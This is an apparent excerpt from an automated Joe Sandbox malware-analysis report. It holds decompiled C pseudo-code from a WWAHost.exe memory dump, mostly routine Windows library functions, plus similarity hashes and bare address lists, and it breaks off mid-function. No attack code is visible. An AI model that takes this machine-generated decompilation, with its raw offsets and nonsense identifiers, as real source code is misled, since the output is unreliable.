                                              					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                              					_t74 = E03973690(1, _t117, 0x3931810, _t118 - 0x74);
                                              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                              					_t101 = _t117[2];
                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                              					if(_t74 < 0) {
                                              						_t64 =  *_t117 & 0x0000ffff;
                                              						_t115 =  *(_t118 - 0x7c);
                                              						goto L20;
                                              					}
                                              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                              					_t115 =  *(_t118 - 0x7c);
                                              					goto L21;
                                              				}
                                              				if(_t103 == 1) {
                                              					_t105 = 4;
                                              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                              					_push(_t118 - 0x70);
                                              					_push(0);
                                              					_push(0);
                                              					_push(_t105);
                                              					_push(_t118 - 0x78);
                                              					_push(0x6b);
                                              					 *((intOrPtr*)(_t118 - 0x64)) = E0399AA90();
                                              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                              					_t113 = L03974620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                              					if(_t113 != 0) {
                                              						_push(_t118 - 0x70);
                                              						_push( *((intOrPtr*)(_t118 - 0x70)));
                                              						_push(_t113);
                                              						_push(4);
                                              						_push(_t118 - 0x78);
                                              						_push(0x6b);
                                              						_t84 = E0399AA90();
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                              						if(_t84 < 0) {
                                              							goto L29;
                                              						}
                                              						_t110 = 0;
                                              						_t106 = 0;
                                              						while(1) {
                                              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                              							 *(_t118 - 0x88) = _t106;
                                              							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                              								break;
                                              							}
                                              							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                              							_t106 = _t106 + 1;
                                              						}
                                              						_t88 = E039D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                              						_t119 = _t119 + 0x1c;
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                              						if(_t88 < 0) {
                                              							goto L29;
                                              						}
                                              						_t101 = _t118 - 0x3c;
                                              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                              						goto L21;
                                              					}
                                              					_t67 = 0xc0000017;
                                              					goto L28;
                                              				}
                                              				_push(0);
                                              				_push(0x20);
                                              				_push(_t118 - 0x60);
                                              				_push(0x5a);
                                              				_t94 = E03999860();
                                              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                              				if(_t94 < 0) {
                                              					goto L29;
                                              				}
                                              				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                              					_t101 = L"Legacy";
                                              					_push(6);
                                              				} else {
                                              					_t101 = L"UEFI";
                                              					_push(4);
                                              				}
                                              				_pop(_t65);
                                              				goto L21;
                                              			}























                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: 1d4dccb46011c728896f9bcbcb045bb95e7fb2ce5c168666fc9b8b6184a41b6e
                                              • Instruction ID: 906620853f5397023d4214e5fb0d98a3c09bdd833f19b41bee5f96a2cec31b33
                                              • Opcode Fuzzy Hash: 1d4dccb46011c728896f9bcbcb045bb95e7fb2ce5c168666fc9b8b6184a41b6e
                                              • Instruction Fuzzy Hash: 3F516AB1A00709DFDB24DFA88881AAEFBF8FB89740F15842DE509EB651D7719900CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 76%
                                              			E0397B944(signed int* __ecx, char __edx) {
                                              				signed int _v8;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				char _v28;
                                              				signed int _v32;
                                              				char _v36;
                                              				signed int _v40;
                                              				intOrPtr _v44;
                                              				signed int* _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				intOrPtr _v60;
                                              				intOrPtr _v64;
                                              				intOrPtr _v68;
                                              				intOrPtr _v72;
                                              				intOrPtr _v76;
                                              				char _v77;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t65;
                                              				intOrPtr _t67;
                                              				intOrPtr _t68;
                                              				char* _t73;
                                              				intOrPtr _t77;
                                              				intOrPtr _t78;
                                              				signed int _t82;
                                              				intOrPtr _t83;
                                              				void* _t87;
                                              				char _t88;
                                              				intOrPtr* _t89;
                                              				intOrPtr _t91;
                                              				void* _t97;
                                              				intOrPtr _t100;
                                              				void* _t102;
                                              				void* _t107;
                                              				signed int _t108;
                                              				intOrPtr* _t112;
                                              				void* _t113;
                                              				intOrPtr* _t114;
                                              				intOrPtr _t115;
                                              				intOrPtr _t116;
                                              				intOrPtr _t117;
                                              				signed int _t118;
                                              				void* _t130;
                                              
                                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                              				_v8 =  *0x3a4d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                              				_t112 = __ecx;
                                              				_v77 = __edx;
                                              				_v48 = __ecx;
                                              				_v28 = 0;
                                              				_t5 = _t112 + 0xc; // 0x575651ff
                                              				_t105 =  *_t5;
                                              				_v20 = 0;
                                              				_v16 = 0;
                                              				if(_t105 == 0) {
                                              					_t50 = _t112 + 4; // 0x5de58b5b
                                              					_t60 =  *__ecx |  *_t50;
                                              					if(( *__ecx |  *_t50) != 0) {
                                              						 *__ecx = 0;
                                              						__ecx[1] = 0;
                                              						if(E03977D50() != 0) {
                                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              						} else {
                                              							_t65 = 0x7ffe0386;
                                              						}
                                              						if( *_t65 != 0) {
                                              							E03A28CD6(_t112);
                                              						}
                                              						_push(0);
                                              						_t52 = _t112 + 0x10; // 0x778df98b
                                              						_push( *_t52);
                                              						_t60 = E03999E20();
                                              					}
                                              					L20:
                                              					_pop(_t107);
                                              					_pop(_t113);
                                              					_pop(_t87);
                                              					return E0399B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                              				}
                                              				_t8 = _t112 + 8; // 0x8b000cc2
                                              				_t67 =  *_t8;
                                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                              				_t108 =  *(_t67 + 0x14);
                                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                              				_t105 = 0x2710;
                                              				asm("sbb eax, edi");
                                              				_v44 = _t88;
                                              				_v52 = _t108;
                                              				_t60 = E0399CE00(_t97, _t68, 0x2710, 0);
                                              				_v56 = _t60;
                                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                              					L3:
                                              					 *(_t112 + 0x44) = _t60;
                                              					_t105 = _t60 * 0x2710 >> 0x20;
                                              					 *_t112 = _t88;
                                              					 *(_t112 + 4) = _t108;
                                              					_v20 = _t60 * 0x2710;
                                              					_v16 = _t60 * 0x2710 >> 0x20;
                                              					if(_v77 != 0) {
                                              						L16:
                                              						_v36 = _t88;
                                              						_v32 = _t108;
                                              						if(E03977D50() != 0) {
                                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              						} else {
                                              							_t73 = 0x7ffe0386;
                                              						}
                                              						if( *_t73 != 0) {
                                              							_t105 = _v40;
                                              							E03A28F6A(_t112, _v40, _t88, _t108);
                                              						}
                                              						_push( &_v28);
                                              						_push(0);
                                              						_push( &_v36);
                                              						_t48 = _t112 + 0x10; // 0x778df98b
                                              						_push( *_t48);
                                              						_t60 = E0399AF60();
                                              						goto L20;
                                              					} else {
                                              						_t89 = 0x7ffe03b0;
                                              						do {
                                              							_t114 = 0x7ffe0010;
                                              							do {
                                              								_t77 =  *0x3a48628; // 0x0
                                              								_v68 = _t77;
                                              								_t78 =  *0x3a4862c; // 0x0
                                              								_v64 = _t78;
                                              								_v72 =  *_t89;
                                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                                              								while(1) {
                                              									_t105 =  *0x7ffe000c;
                                              									_t100 =  *0x7ffe0008;
                                              									if(_t105 ==  *_t114) {
                                              										goto L8;
                                              									}
                                              									asm("pause");
                                              								}
                                              								L8:
                                              								_t89 = 0x7ffe03b0;
                                              								_t115 =  *0x7ffe03b0;
                                              								_t82 =  *0x7FFE03B4;
                                              								_v60 = _t115;
                                              								_t114 = 0x7ffe0010;
                                              								_v56 = _t82;
                                              							} while (_v72 != _t115 || _v76 != _t82);
                                              							_t83 =  *0x3a48628; // 0x0
                                              							_t116 =  *0x3a4862c; // 0x0
                                              							_v76 = _t116;
                                              							_t117 = _v68;
                                              						} while (_t117 != _t83 || _v64 != _v76);
                                              						asm("sbb edx, [esp+0x24]");
                                              						_t102 = _t100 - _v60 - _t117;
                                              						_t112 = _v48;
                                              						_t91 = _v44;
                                              						asm("sbb edx, eax");
                                              						_t130 = _t105 - _v52;
                                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                              							_t88 = _t102 - _t91;
                                              							asm("sbb edx, edi");
                                              							_t108 = _t105;
                                              						} else {
                                              							_t88 = 0;
                                              							_t108 = 0;
                                              						}
                                              						goto L16;
                                              					}
                                              				} else {
                                              					if( *(_t112 + 0x44) == _t60) {
                                              						goto L20;
                                              					}
                                              					goto L3;
                                              				}
                                              			}

















































                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0397B9A5
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 885266447-0
                                              • Opcode ID: 7751580ed0a3014d8537f2ba3ceba75a10180ea1f7f4f629b63e4eb134ff8aec
                                              • Instruction ID: 6cf76f587731b0def3cc472be0d9f477451ae002b6dcbbb144195582140aecfc
                                              • Opcode Fuzzy Hash: 7751580ed0a3014d8537f2ba3ceba75a10180ea1f7f4f629b63e4eb134ff8aec
                                              • Instruction Fuzzy Hash: F5515875A08345CFD724EF29C08092AFBE9FB88654F24496EF99587394E731EC44CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E0395B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                              				signed int _t65;
                                              				signed short _t69;
                                              				intOrPtr _t70;
                                              				signed short _t85;
                                              				void* _t86;
                                              				signed short _t89;
                                              				signed short _t91;
                                              				intOrPtr _t92;
                                              				intOrPtr _t97;
                                              				intOrPtr* _t98;
                                              				signed short _t99;
                                              				signed short _t101;
                                              				void* _t102;
                                              				char* _t103;
                                              				signed short _t104;
                                              				intOrPtr* _t110;
                                              				void* _t111;
                                              				void* _t114;
                                              				intOrPtr* _t115;
                                              
                                              				_t109 = __esi;
                                              				_t108 = __edi;
                                              				_t106 = __edx;
                                              				_t95 = __ebx;
                                              				_push(0x90);
                                              				_push(0x3a2f7a8);
                                              				E039AD0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                              				if(__edx == 0xffffffff) {
                                              					L6:
                                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                              					__eflags = _t65 & 0x00000002;
                                              					if((_t65 & 0x00000002) != 0) {
                                              						L3:
                                              						L4:
                                              						return E039AD130(_t95, _t108, _t109);
                                              					}
                                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                              					_t108 = 0;
                                              					_t109 = 0;
                                              					_t95 = 0;
                                              					__eflags = 0;
                                              					while(1) {
                                              						__eflags = _t95 - 0x200;
                                              						if(_t95 >= 0x200) {
                                              							break;
                                              						}
                                              						E0399D000(0x80);
                                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                              						_t108 = _t115;
                                              						_t95 = _t95 - 0xffffff80;
                                              						_t17 = _t114 - 4;
                                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                              						__eflags =  *_t17;
                                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                              						_t102 = _t110 + 1;
                                              						do {
                                              							_t85 =  *_t110;
                                              							_t110 = _t110 + 1;
                                              							__eflags = _t85;
                                              						} while (_t85 != 0);
                                              						_t111 = _t110 - _t102;
                                              						_t21 = _t95 - 1; // -129
                                              						_t86 = _t21;
                                              						__eflags = _t111 - _t86;
                                              						if(_t111 > _t86) {
                                              							_t111 = _t86;
                                              						}
                                              						E0399F3E0(_t108, _t106, _t111);
                                              						_t115 = _t115 + 0xc;
                                              						_t103 = _t111 + _t108;
                                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                              						_t89 = _t95 - _t111;
                                              						__eflags = _t89;
                                              						_push(0);
                                              						if(_t89 == 0) {
                                              							L15:
                                              							_t109 = 0xc000000d;
                                              							goto L16;
                                              						} else {
                                              							__eflags = _t89 - 0x7fffffff;
                                              							if(_t89 <= 0x7fffffff) {
                                              								L16:
                                              								 *(_t114 - 0x94) = _t109;
                                              								__eflags = _t109;
                                              								if(_t109 < 0) {
                                              									__eflags = _t89;
                                              									if(_t89 != 0) {
                                              										 *_t103 = 0;
                                              									}
                                              									L26:
                                              									 *(_t114 - 0xa0) = _t109;
                                              									 *(_t114 - 4) = 0xfffffffe;
                                              									__eflags = _t109;
                                              									if(_t109 >= 0) {
                                              										L31:
                                              										_t98 = _t108;
                                              										_t39 = _t98 + 1; // 0x1
                                              										_t106 = _t39;
                                              										do {
                                              											_t69 =  *_t98;
                                              											_t98 = _t98 + 1;
                                              											__eflags = _t69;
                                              										} while (_t69 != 0);
                                              										_t99 = _t98 - _t106;
                                              										__eflags = _t99;
                                              										L34:
                                              										_t70 =  *[fs:0x30];
                                              										__eflags =  *((char*)(_t70 + 2));
                                              										if( *((char*)(_t70 + 2)) != 0) {
                                              											L40:
                                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                              											 *(_t114 - 4) = 1;
                                              											_push(_t114 - 0x74);
                                              											L039ADEF0(_t99, _t106);
                                              											 *(_t114 - 4) = 0xfffffffe;
                                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                              											goto L3;
                                              										}
                                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                              											goto L40;
                                              										}
                                              										_push( *((intOrPtr*)(_t114 + 8)));
                                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                              										_push(_t99 & 0x0000ffff);
                                              										_push(_t108);
                                              										_push(1);
                                              										_t101 = E0399B280();
                                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                              										if( *((char*)(_t114 + 0x14)) == 1) {
                                              											__eflags = _t101 - 0x80000003;
                                              											if(_t101 == 0x80000003) {
                                              												E0399B7E0(1);
                                              												_t101 = 0;
                                              												__eflags = 0;
                                              											}
                                              										}
                                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                              										goto L4;
                                              									}
                                              									__eflags = _t109 - 0x80000005;
                                              									if(_t109 == 0x80000005) {
                                              										continue;
                                              									}
                                              									break;
                                              								}
                                              								 *(_t114 - 0x90) = 0;
                                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                              								_t91 = E0399E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                              								_t115 = _t115 + 0x10;
                                              								_t104 = _t91;
                                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                              								__eflags = _t104;
                                              								if(_t104 < 0) {
                                              									L21:
                                              									_t109 = 0x80000005;
                                              									 *(_t114 - 0x90) = 0x80000005;
                                              									L22:
                                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                              									L23:
                                              									 *(_t114 - 0x94) = _t109;
                                              									goto L26;
                                              								}
                                              								__eflags = _t104 - _t92;
                                              								if(__eflags > 0) {
                                              									goto L21;
                                              								}
                                              								if(__eflags == 0) {
                                              									goto L22;
                                              								}
                                              								goto L23;
                                              							}
                                              							goto L15;
                                              						}
                                              					}
                                              					__eflags = _t109;
                                              					if(_t109 >= 0) {
                                              						goto L31;
                                              					}
                                              					__eflags = _t109 - 0x80000005;
                                              					if(_t109 != 0x80000005) {
                                              						goto L31;
                                              					}
                                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                              					_t38 = _t95 - 1; // -129
                                              					_t99 = _t38;
                                              					goto L34;
                                              				}
                                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                              					__eflags = __edx - 0x65;
                                              					if(__edx != 0x65) {
                                              						goto L2;
                                              					}
                                              					goto L6;
                                              				}
                                              				L2:
                                              				_push( *((intOrPtr*)(_t114 + 8)));
                                              				_push(_t106);
                                              				if(E0399A890() != 0) {
                                              					goto L6;
                                              				}
                                              				goto L3;
                                              			}






















                                              0x039b4965
                                              0x039b4969
                                              0x039b49ba
                                              0x039b49ba
                                              0x039b49c1
                                              0x039b49c5
                                              0x039b49cc
                                              0x039b49d4
                                              0x039b49d7
                                              0x039b49da
                                              0x039b49e4
                                              0x039b49e5
                                              0x039b49f3
                                              0x039b4a02
                                              0x00000000
                                              0x039b4a02
                                              0x039b4972
                                              0x039b4974
                                              0x00000000
                                              0x00000000
                                              0x039b4976
                                              0x039b4979
                                              0x039b4982
                                              0x039b4983
                                              0x039b4984
                                              0x039b498b
                                              0x039b498d
                                              0x039b4991
                                              0x039b4993
                                              0x039b4999
                                              0x039b499d
                                              0x039b49a2
                                              0x039b49a2
                                              0x039b49a2
                                              0x039b4999
                                              0x039b49ac
                                              0x00000000
                                              0x039b49b3
                                              0x039b48f8
                                              0x039b48fe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b48fe
                                              0x039b4895
                                              0x039b489c
                                              0x039b48ad
                                              0x039b48b2
                                              0x039b48b5
                                              0x039b48b7
                                              0x039b48ba
                                              0x039b48bc
                                              0x039b48c6
                                              0x039b48c6
                                              0x039b48cb
                                              0x039b48d1
                                              0x039b48d4
                                              0x039b48d8
                                              0x039b48d8
                                              0x00000000
                                              0x039b48d8
                                              0x039b48be
                                              0x039b48c0
                                              0x00000000
                                              0x00000000
                                              0x039b48c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b48c4
                                              0x00000000
                                              0x039b4882
                                              0x039b487b
                                              0x039b4904
                                              0x039b4906
                                              0x00000000
                                              0x00000000
                                              0x039b4908
                                              0x039b490e
                                              0x00000000
                                              0x00000000
                                              0x039b4910
                                              0x039b4917
                                              0x039b4917
                                              0x00000000
                                              0x039b4917
                                              0x0395b1ba
                                              0x039b47f9
                                              0x039b47fc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b47fc
                                              0x0395b1c0
                                              0x0395b1c0
                                              0x0395b1c3
                                              0x0395b1cb
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: _vswprintf_s
                                              • String ID:
                                              • API String ID: 677850445-0
                                              • Opcode ID: d78aafa3b54a4c7c0e2af1b6b5ba58c5cf9b339b781cc1d56378971a5ceb5ad2
                                              • Instruction ID: b08a18af55cb481fbd416bb24a8479ef600a932050d221481f20d0d1414c7eb9
                                              • Opcode Fuzzy Hash: d78aafa3b54a4c7c0e2af1b6b5ba58c5cf9b339b781cc1d56378971a5ceb5ad2
                                              • Instruction Fuzzy Hash: 1351E175D042698FEF31CF69CA40BFEBBB8AF40750F1441A9E859AB282D7304D41EB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E03982581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35, char _a1530200980, char _a1546912660) {
                                              				signed int _v8;
                                              				signed int _v16;
                                              				unsigned int _v24;
                                              				void* _v28;
                                              				signed int _v32;
                                              				unsigned int _v36;
                                              				signed int _v37;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				intOrPtr _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _t236;
                                              				signed int _t240;
                                              				signed int _t242;
                                              				void* _t248;
                                              				void* _t249;
                                              				signed int _t253;
                                              				signed int _t255;
                                              				intOrPtr _t257;
                                              				signed int _t260;
                                              				signed int _t267;
                                              				signed int _t270;
                                              				signed int _t278;
                                              				intOrPtr _t284;
                                              				signed int _t286;
                                              				signed int _t288;
                                              				void* _t289;
                                              				void* _t293;
                                              				signed int _t294;
                                              				unsigned int _t297;
                                              				signed int _t301;
                                              				signed int _t304;
                                              				signed int _t308;
                                              				intOrPtr _t321;
                                              				signed int _t330;
                                              				signed int _t332;
                                              				signed int _t333;
                                              				signed int _t337;
                                              				signed int _t338;
                                              				intOrPtr* _t340;
                                              				void* _t341;
                                              				signed int _t342;
                                              				signed int _t344;
                                              				signed int _t347;
                                              				void* _t348;
                                              				void* _t351;
                                              
                                              				_t344 = _t347;
                                              				_t348 = _t347 - 0x4c;
                                              				_v8 =  *0x3a4d360 ^ _t344;
                                              				_push(__ebx);
                                              				_push(__esi);
                                              				_push(__edi);
                                              				_t337 = 0x3a4b2e8;
                                              				_v56 = _a4;
                                              				_v48 = __edx;
                                              				_v60 = __ecx;
                                              				_t297 = 0;
                                              				_v80 = 0;
                                              				asm("movsd");
                                              				_v64 = 0;
                                              				_v76 = 0;
                                              				_v72 = 0;
                                              				asm("movsd");
                                              				_v44 = 0;
                                              				_v52 = 0;
                                              				_v68 = 0;
                                              				asm("movsd");
                                              				_v32 = 0;
                                              				_v36 = 0;
                                              				asm("movsd");
                                              				_v16 = 0;
                                              				_t284 = 0x48;
                                              				_t318 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                              				_t330 = 0;
                                              				_v37 = _t318;
                                              				if(_v48 <= 0) {
                                              					L16:
                                              					_t45 = _t284 - 0x48; // 0x0
                                              					__eflags = _t45 - 0xfffe;
                                              					if(_t45 > 0xfffe) {
                                              						_t338 = 0xc0000106;
                                              						goto L32;
                                              					} else {
                                              						_t337 = L03974620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
                                              						_v52 = _t337;
                                              						__eflags = _t337;
                                              						if(_t337 == 0) {
                                              							_t338 = 0xc0000017;
                                              							goto L32;
                                              						} else {
                                              							 *(_t337 + 0x44) =  *(_t337 + 0x44) & 0x00000000;
                                              							_t50 = _t337 + 0x48; // 0x48
                                              							_t332 = _t50;
                                              							_t318 = _v32;
                                              							 *((intOrPtr*)(_t337 + 0x3c)) = _t284;
                                              							_t286 = 0;
                                              							 *((short*)(_t337 + 0x30)) = _v48;
                                              							__eflags = _t318;
                                              							if(_t318 != 0) {
                                              								 *(_t337 + 0x18) = _t332;
                                              								__eflags = _t318 - 0x3a48478;
                                              								 *_t337 = ((0 | _t318 == 0x03a48478) - 0x00000001 & 0xfffffffb) + 7;
                                              								E0399F3E0(_t332,  *((intOrPtr*)(_t318 + 4)),  *_t318 & 0x0000ffff);
                                              								_t318 = _v32;
                                              								_t348 = _t348 + 0xc;
                                              								_t286 = 1;
                                              								__eflags = _a8;
                                              								_t332 = _t332 + (( *_t318 & 0x0000ffff) >> 1) * 2;
                                              								if(_a8 != 0) {
                                              									_t278 = E039E39F2(_t332);
                                              									_t318 = _v32;
                                              									_t332 = _t278;
                                              								}
                                              							}
                                              							_t301 = 0;
                                              							_v16 = 0;
                                              							__eflags = _v48;
                                              							if(_v48 <= 0) {
                                              								L31:
                                              								_t338 = _v68;
                                              								__eflags = 0;
                                              								 *((short*)(_t332 - 2)) = 0;
                                              								goto L32;
                                              							} else {
                                              								_t288 = _t337 + _t286 * 4;
                                              								_v56 = _t288;
                                              								do {
                                              									__eflags = _t318;
                                              									if(_t318 != 0) {
                                              										_t236 =  *(_v60 + _t301 * 4);
                                              										__eflags = _t236;
                                              										if(_t236 == 0) {
                                              											goto L30;
                                              										} else {
                                              											__eflags = _t236 == 5;
                                              											if(_t236 == 5) {
                                              												goto L30;
                                              											} else {
                                              												goto L22;
                                              											}
                                              										}
                                              									} else {
                                              										L22:
                                              										 *_t288 =  *(_v60 + _t301 * 4);
                                              										 *(_t288 + 0x18) = _t332;
                                              										_t240 =  *(_v60 + _t301 * 4);
                                              										__eflags = _t240 - 8;
                                              										if(_t240 > 8) {
                                              											goto L56;
                                              										} else {
                                              											switch( *((intOrPtr*)(_t240 * 4 +  &M03982959))) {
                                              												case 0:
                                              													__ax =  *0x3a48488;
                                              													__eflags = __ax;
                                              													if(__ax == 0) {
                                              														goto L29;
                                              													} else {
                                              														__ax & 0x0000ffff = E0399F3E0(__edi,  *0x3a4848c, __ax & 0x0000ffff);
                                              														__eax =  *0x3a48488 & 0x0000ffff;
                                              														goto L26;
                                              													}
                                              													goto L108;
                                              												case 1:
                                              													L45:
                                              													E0399F3E0(_t332, _v80, _v64);
                                              													_t273 = _v64;
                                              													goto L26;
                                              												case 2:
                                              													 *0x3a48480 & 0x0000ffff = E0399F3E0(__edi,  *0x3a48484,  *0x3a48480 & 0x0000ffff);
                                              													__eax =  *0x3a48480 & 0x0000ffff;
                                              													__eax = ( *0x3a48480 & 0x0000ffff) >> 1;
                                              													__edi = __edi + __eax * 2;
                                              													goto L28;
                                              												case 3:
                                              													__eax = _v44;
                                              													__eflags = __eax;
                                              													if(__eax == 0) {
                                              														goto L29;
                                              													} else {
                                              														__esi = __eax + __eax;
                                              														__eax = E0399F3E0(__edi, _v72, __esi);
                                              														__edi = __edi + __esi;
                                              														__esi = _v52;
                                              														goto L27;
                                              													}
                                              													goto L108;
                                              												case 4:
                                              													_push(0x2e);
                                              													_pop(__eax);
                                              													 *(__esi + 0x44) = __edi;
                                              													 *__edi = __ax;
                                              													__edi = __edi + 4;
                                              													_push(0x3b);
                                              													_pop(__eax);
                                              													 *(__edi - 2) = __ax;
                                              													goto L29;
                                              												case 5:
                                              													__eflags = _v36;
                                              													if(_v36 == 0) {
                                              														goto L45;
                                              													} else {
                                              														E0399F3E0(_t332, _v76, _v36);
                                              														_t273 = _v36;
                                              													}
                                              													L26:
                                              													_t348 = _t348 + 0xc;
                                              													_t332 = _t332 + (_t273 >> 1) * 2 + 2;
                                              													__eflags = _t332;
                                              													L27:
                                              													_push(0x3b);
                                              													_pop(_t275);
                                              													 *((short*)(_t332 - 2)) = _t275;
                                              													goto L28;
                                              												case 6:
                                              													__ebx = "\\WWw\\WWw";
                                              													__eflags = __ebx - "\\WWw\\WWw";
                                              													if(__ebx != "\\WWw\\WWw") {
                                              														_push(0x3b);
                                              														_pop(__esi);
                                              														do {
                                              															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
